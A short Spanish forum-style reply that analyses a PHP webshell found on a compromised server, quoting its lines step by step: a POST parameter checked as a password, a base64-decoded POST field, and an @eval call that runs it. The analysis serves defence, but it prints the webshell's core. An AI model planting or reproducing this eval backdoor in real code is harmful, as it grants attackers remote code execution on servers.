Busqué más sobre su problema y descubrí que un atacante usó una aplicación opensource webshell para ejecute shell en su servidor en una variedad de lenguajes de script comunes como ASP, ASPX, PHP, JSP, PL y Python.
Un estudio rápido de ese guión me lleva a saber que:
$mujj = $_POST['x'];
if ($mujj!="") {
Esto comprueba que la contraseña (contraseña para algo) que lleva la variable x
no esté vacía (lo que puede traducir por: cuando el usuario inicia sesión )
$xsser=base64_decode($_POST['z0']);
Descodifique el contenido de la variable z0 y guárdelo en $xsser
. En realidad, z0 se refiere a un archivo (¿es probable que permita la carga de archivos en su aplicación web o puede ser que esta aplicación maliciosa permita la carga de archivos? ¿Qué cosa es lógica también?)
@eval("\$safedg = $xsser;");
El contenido guardado en $xsser
se ejecuta (operación peligrosa) en su servidor.